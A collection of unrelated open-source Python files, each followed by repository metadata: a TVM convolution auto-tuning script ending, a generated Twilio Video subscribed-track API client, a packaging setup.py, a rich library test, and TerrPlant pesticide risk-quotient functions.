tuner.tune(n_trial=n_trial,
measure_option=measure_option,
callbacks=[
autotvm.callback.progress_bar(n_trial, prefix=layer),
autotvm.callback.log_to_file(log_file)])
with autotvm.apply_history_best( layer+'.log'):
with tvm.target.create("llvm"):
a_np, w_np, b_np = get_ref_data(batch,out_channel,in_channel,input_height,input_width,kernel_height, kernel_width,stride_height,pad_height)
s, arg_bufs = conv_auto_tuned(vlen,output_width, vlen, stride_width,input_width + 2*pad_width, in_channel,\
input_height + 2*pad_height, kernel_height, kernel_width,output_height, stride_height, batch, out_channel)
a_np2 = convert_input(a_np, batch, in_channel,input_height,input_width,pad_height,pad_width,vlen, arg_bufs[1])
w_np2 = convert_weight(w_np, in_channel, out_channel, kernel_height, kernel_width,vlen,arg_bufs[0])
ctx = tvm.context('llvm', 0)
b = tvm.nd.array(np.zeros((batch, math.ceil(out_channel/vlen),output_height, output_width,vlen), dtype=arg_bufs[2].dtype), ctx)
a = tvm.nd.array(a_np2, ctx)
w = tvm.nd.array(w_np2, ctx)
func = tvm.build(s, arg_bufs,target=\
'llvm -mtriple=x86_64 -mcpu=skylake-avx512 -mattr=+skx,+fma,+fma4,+avx512ifma,+avx512f,+avx512cd,+avx512bw,+avx512vl,+avx512dq', name="conv2d")
func(w,a,b)
b_np_A = convert_output(b.asnumpy(), 1,out_channel, output_height, output_width,vlen)
np.testing.assert_allclose(b_np_A, b_np, rtol=1e-5)
evaluator1 = func.time_evaluator(func.entry_name, ctx, number=1000,repeat=1, min_repeat_ms=1)
t1 = evaluator1(w,a, b).mean
gflops_tvm1 = np.prod(get_const_tuple(arg_bufs[2].shape))*in_channel*kernel_height*kernel_width*2
gflops_tvm1 = gflops_tvm1/1e9/t1
print("Time for conv(tuned) is : {0:.6f}".format(t1))
print("GFLOPS : {0:.3f} ".format( gflops_tvm1))
sheet1.write(row1,1,gflops_tvm1)
row1 = row1 + 1
book.save( "AutoTVM_tensorize_resnet" + layer +".xls")
if __name__ == "__main__":
driver()
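# Example invocation (a sketch; only the layer name is varied, everything else comes from this file):
#     python mb1_tuned_latest.py -d resnet4
# This tunes the resnet4 layer from _resnet_layers and writes the measured GFLOPS to
# "AutoTVM_tensorize_resnet" + layer + ".xls", i.e. AutoTVM_tensorize_resnetresnet4.xls.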
|
hfp/libxsmm
|
samples/deeplearning/tvm_cnnlayer/mb1_tuned_latest.py
|
Python
|
bsd-3-clause
| 20,227
| 0.039996
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class SubscribedTrackList(ListResource):
""" """
def __init__(self, version, room_sid, participant_sid):
"""
Initialize the SubscribedTrackList
:param Version version: Version that contains the resource
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackList
"""
super(SubscribedTrackList, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, }
self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams SubscribedTrackInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'], limits['page_limit'])
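    # A hedged usage sketch (not part of this module); the client construction and the
    # room/participant SIDs below are placeholder assumptions:
    #
    #     from twilio.rest import Client
    #     client = Client(account_sid, auth_token)
    #     tracks = client.video.rooms('RMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') \
    #                          .participants('PAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') \
    #                          .subscribed_tracks \
    #                          .stream(limit=20)
    #     for track in tracks:
    #         print(track.sid, track.kind, track.enabled)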
def list(self, limit=None, page_size=None):
"""
Lists SubscribedTrackInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
params = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(
'GET',
self._uri,
params=params,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of SubscribedTrackInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return SubscribedTrackPage(self._version, response, self._solution)
def get(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __call__(self, sid):
"""
Constructs a SubscribedTrackContext
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
return SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackList>'
class SubscribedTrackPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the SubscribedTrackPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param room_sid: The SID of the room where the track is published
:param participant_sid: The SID of the participant that subscribes to the track
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackPage
"""
super(SubscribedTrackPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of SubscribedTrackInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
return SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Video.V1.SubscribedTrackPage>'
class SubscribedTrackContext(InstanceContext):
""" """
def __init__(self, version, room_sid, participant_sid, sid):
"""
Initialize the SubscribedTrackContext
:param Version version: Version that contains the resource
:param room_sid: The SID of the Room where the Track resource to fetch is subscribed
:param participant_sid: The SID of the participant that subscribes to the Track resource to fetch
:param sid: The SID that identifies the resource to fetch
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
super(SubscribedTrackContext, self).__init__(version)
# Path Solution
self._solution = {'room_sid': room_sid, 'participant_sid': participant_sid, 'sid': sid, }
self._uri = '/Rooms/{room_sid}/Participants/{participant_sid}/SubscribedTracks/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch a SubscribedTrackInstance
:returns: Fetched SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
params = values.of({})
payload = self._version.fetch(
'GET',
self._uri,
params=params,
)
return SubscribedTrackInstance(
self._version,
payload,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=self._solution['sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Video.V1.SubscribedTrackContext {}>'.format(context)
class SubscribedTrackInstance(InstanceResource):
""" """
class Kind(object):
AUDIO = "audio"
VIDEO = "video"
DATA = "data"
def __init__(self, version, payload, room_sid, participant_sid, sid=None):
"""
Initialize the SubscribedTrackInstance
:returns: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
super(SubscribedTrackInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'participant_sid': payload.get('participant_sid'),
'publisher_sid': payload.get('publisher_sid'),
'room_sid': payload.get('room_sid'),
'name': payload.get('name'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'enabled': payload.get('enabled'),
'kind': payload.get('kind'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {
'room_sid': room_sid,
'participant_sid': participant_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: SubscribedTrackContext for this SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackContext
"""
if self._context is None:
self._context = SubscribedTrackContext(
self._version,
room_sid=self._solution['room_sid'],
participant_sid=self._solution['participant_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def participant_sid(self):
"""
:returns: The SID of the participant that subscribes to the track
:rtype: unicode
"""
return self._properties['participant_sid']
@property
def publisher_sid(self):
"""
:returns: The SID of the participant that publishes the track
:rtype: unicode
"""
return self._properties['publisher_sid']
@property
def room_sid(self):
"""
:returns: The SID of the room where the track is published
:rtype: unicode
"""
return self._properties['room_sid']
@property
def name(self):
"""
:returns: The track name
:rtype: unicode
"""
return self._properties['name']
@property
def date_created(self):
"""
:returns: The ISO 8601 date and time in GMT when the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The ISO 8601 date and time in GMT when the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def enabled(self):
"""
:returns: Whether the track is enabled
:rtype: bool
"""
return self._properties['enabled']
@property
def kind(self):
"""
:returns: The track type
:rtype: SubscribedTrackInstance.Kind
"""
return self._properties['kind']
@property
def url(self):
"""
:returns: The absolute URL of the resource
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch a SubscribedTrackInstance
:returns: Fetched SubscribedTrackInstance
:rtype: twilio.rest.video.v1.room.room_participant.room_participant_subscribed_track.SubscribedTrackInstance
"""
return self._proxy.fetch()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Video.V1.SubscribedTrackInstance {}>'.format(context)
|
tysonholub/twilio-python
|
twilio/rest/video/v1/room/room_participant/room_participant_subscribed_track.py
|
Python
|
mit
| 15,072
| 0.003715
|
#!/usr/bin/python
# coding=utf-8
from setuptools import setup, find_packages
setup(
name = "HEIGVD_TimetableParser",
version = "0.1",
packages = find_packages(),
install_requires = ['icalendar>=3.5', 'xlrd>=0.9.2'],
# metadata for upload to PyPI
author = "Leeroy Brun",
author_email = "leeroy.brun@gmail.com",
description = "Transforme un horaire au format XLS provenant de l'intranet du département FEE de la HEIG-VD en un fichier ICS.",
license = "MIT",
keywords = "heig-vd ics xls fee",
url = "https://github.com/leeroybrun/heigvd-timetable-parser",
)
|
leeroybrun/heigvd-timetable-parser
|
setup.py
|
Python
|
mit
| 604
| 0.036484
|
import io
from rich.console import Console
from rich.measure import Measurement
from rich.styled import Styled
def test_styled():
styled_foo = Styled("foo", "on red")
console = Console(file=io.StringIO(), force_terminal=True, _environ={})
assert Measurement.get(console, console.options, styled_foo) == Measurement(3, 3)
console.print(styled_foo)
result = console.file.getvalue()
expected = "\x1b[41mfoo\x1b[0m\n"
assert result == expected
|
willmcgugan/rich
|
tests/test_styled.py
|
Python
|
mit
| 471
| 0.002123
|
from __future__ import division #brings in Python 3.0 mixed type calculation rules
import logging
import numpy as np
import pandas as pd
class TerrplantFunctions(object):
"""
    Function class for TerrPlant.
"""
    def __init__(self):
        """Class representing the functions for TerrPlant."""
super(TerrplantFunctions, self).__init__()
def run_dry(self):
"""
EEC for runoff for dry areas
"""
self.out_run_dry = (self.application_rate / self.incorporation_depth) * self.runoff_fraction
return self.out_run_dry
def run_semi(self):
"""
EEC for runoff to semi-aquatic areas
"""
self.out_run_semi = (self.application_rate / self.incorporation_depth) * self.runoff_fraction * 10
return self.out_run_semi
def spray(self):
"""
EEC for spray drift
"""
self.out_spray = self.application_rate * self.drift_fraction
return self.out_spray
def total_dry(self):
"""
EEC total for dry areas
"""
self.out_total_dry = self.out_run_dry + self.out_spray
return self.out_total_dry
def total_semi(self):
"""
EEC total for semi-aquatic areas
"""
self.out_total_semi = self.out_run_semi + self.out_spray
return self.out_total_semi
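    # A worked numeric sketch (the inputs are illustrative assumptions, not model defaults):
    # with application_rate = 1.0, incorporation_depth = 1.0, runoff_fraction = 0.05 and
    # drift_fraction = 0.01 the EECs above evaluate to
    #     run_dry    = (1.0 / 1.0) * 0.05      = 0.05
    #     run_semi   = (1.0 / 1.0) * 0.05 * 10 = 0.50
    #     spray      = 1.0 * 0.01              = 0.01
    #     total_dry  = 0.05 + 0.01             = 0.06
    #     total_semi = 0.50 + 0.01             = 0.51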
def nms_rq_dry(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a DRY area
"""
self.out_nms_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_dry
def loc_nms_dry(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a dry area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_dry]
self.out_nms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
# exceed_boolean = self.out_nms_rq_dry >= 1.0
# self.out_nms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nms_loc_dry
def nms_rq_semi(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_nms_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_monocot
return self.out_nms_rq_semi
def loc_nms_semi(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide X in a semi-aquatic area
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_semi]
self.out_nms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_semi >= 1.0
#self.out_nms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nms_loc_semi
def nms_rq_spray(self):
"""
Risk Quotient for NON-LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nms_rq_spray = self.out_spray / self.out_min_nms_spray
return self.out_nms_rq_spray
def loc_nms_spray(self):
"""
Level of concern for non-listed monocot seedlings exposed to pesticide via spray drift
"""
msg_pass = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nms_rq_spray]
self.out_nms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nms_rq_spray >= 1.0
#self.out_nms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nms_loc_spray
def lms_rq_dry(self):
"""
        Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in DRY areas
"""
self.out_lms_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_dry
def loc_lms_dry(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide via runoff in a dry area
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_dry]
self.out_lms_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_dry >= 1.0
#self.out_lms_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lms_loc_dry
def lms_rq_semi(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X in a SEMI-AQUATIC area
"""
self.out_lms_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_monocot
return self.out_lms_rq_semi
def loc_lms_semi(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_semi]
self.out_lms_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_semi >= 1.0
#self.out_lms_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_lms_loc_semi
def lms_rq_spray(self):
"""
Risk Quotient for LISTED MONOCOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_lms_rq_spray = self.out_spray / self.out_min_lms_spray
return self.out_lms_rq_spray
def loc_lms_spray(self):
"""
Level of concern for listed monocot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lms_rq_spray]
self.out_lms_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lms_rq_spray >= 1.0
#self.out_lms_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for listed monocot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_lms_loc_spray
def nds_rq_dry(self):
"""
Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X in DRY areas
"""
self.out_nds_rq_dry = self.out_total_dry / self.ec25_nonlisted_seedling_emergence_dicot
return self.out_nds_rq_dry
def loc_nds_dry(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X in dry areas
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_dry]
self.out_nds_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_dry >= 1.0
#self.out_nds_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_nds_loc_dry
def nds_rq_semi(self):
"""
Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X in SEMI-AQUATIC areas
"""
self.out_nds_rq_semi = self.out_total_semi / self.ec25_nonlisted_seedling_emergence_dicot
return self.out_nds_rq_semi
def loc_nds_semi(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_semi]
self.out_nds_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_semi >= 1.0
#self.out_nds_loc_semi = exceed_boolean.map(lambda x:
#'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_nds_loc_semi
def nds_rq_spray(self):
"""
        Risk Quotient for NON-LISTED DICOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_nds_rq_spray = self.out_spray / self.out_min_nds_spray
return self.out_nds_rq_spray
def loc_nds_spray(self):
"""
Level of concern for non-listed dicot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_nds_rq_spray]
self.out_nds_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_nds_rq_spray >= 1.0
#self.out_nds_loc_spray = exceed_boolean.map(lambda x:
# 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for non-listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_nds_loc_spray
def lds_rq_dry(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X in DRY areas
"""
self.out_lds_rq_dry = self.out_total_dry / self.noaec_listed_seedling_emergence_dicot
return self.out_lds_rq_dry
def loc_lds_dry(self):
"""
        Level of concern for listed dicot seedlings exposed to pesticide X in dry areas
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_dry]
self.out_lds_loc_dry = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_dry >= 1.0
#self.out_lds_loc_dry = exceed_boolean.map(lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to dry areas indicates that potential risk is minimal.')
return self.out_lds_loc_dry
def lds_rq_semi(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X in SEMI-AQUATIC areas
"""
self.out_lds_rq_semi = self.out_total_semi / self.noaec_listed_seedling_emergence_dicot
return self.out_lds_rq_semi
def loc_lds_semi(self):
"""
        Level of concern for listed dicot seedlings exposed to pesticide X in semi-aquatic areas
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_semi]
self.out_lds_loc_semi = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_semi >= 1.0
#self.out_lds_loc_semi = exceed_boolean.map(lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via runoff to semi-aquatic areas indicates that potential risk is minimal.')
return self.out_lds_loc_semi
def lds_rq_spray(self):
"""
Risk Quotient for LISTED DICOT seedlings exposed to Pesticide X via SPRAY drift
"""
self.out_lds_rq_spray = self.out_spray / self.out_min_lds_spray
return self.out_lds_rq_spray
def loc_lds_spray(self):
"""
Level of concern for listed dicot seedlings exposed to pesticide X via spray drift
"""
msg_pass = "The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk."
msg_fail = "The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal."
boo_ratios = [ratio >= 1.0 for ratio in self.out_lds_rq_spray]
self.out_lds_loc_spray = pd.Series([msg_pass if boo else msg_fail for boo in boo_ratios])
#exceed_boolean = self.out_lds_rq_spray >= 1.0
#self.out_lds_loc_spray = exceed_boolean.map(
# lambda x:
# 'The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates a potential risk.' if x == True
# else 'The risk quotient for listed dicot seedlings exposed to the pesticide via spray drift indicates that potential risk is minimal.')
return self.out_lds_loc_spray
def min_nms_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
        non-listed monocot EC25 (seedling emergence and vegetative vigor)
"""
s1 = pd.Series(self.ec25_nonlisted_seedling_emergence_monocot, name='seedling')
s2 = pd.Series(self.ec25_nonlisted_vegetative_vigor_monocot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_nms_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_nms_spray
def min_lms_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
        listed monocot NOAEC (seedling emergence and vegetative vigor)
"""
s1 = pd.Series(self.noaec_listed_seedling_emergence_monocot, name='seedling')
s2 = pd.Series(self.noaec_listed_vegetative_vigor_monocot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_lms_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_lms_spray
def min_nds_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
        non-listed dicot EC25 (seedling emergence and vegetative vigor)
"""
s1 = pd.Series(self.ec25_nonlisted_seedling_emergence_dicot, name='seedling')
s2 = pd.Series(self.ec25_nonlisted_vegetative_vigor_dicot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_nds_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_nds_spray
def min_lds_spray(self):
"""
determine minimum toxicity concentration used for RQ spray drift values
        listed dicot NOAEC (seedling emergence and vegetative vigor)
"""
s1 = pd.Series(self.noaec_listed_seedling_emergence_dicot, name='seedling')
s2 = pd.Series(self.noaec_listed_vegetative_vigor_dicot, name='vegetative')
df = pd.concat([s1, s2], axis=1)
self.out_min_lds_spray = pd.DataFrame.min(df, axis=1)
return self.out_min_lds_spray
|
puruckertom/ubertool
|
ubertool/terrplant/terrplant_functions.py
|
Python
|
unlicense
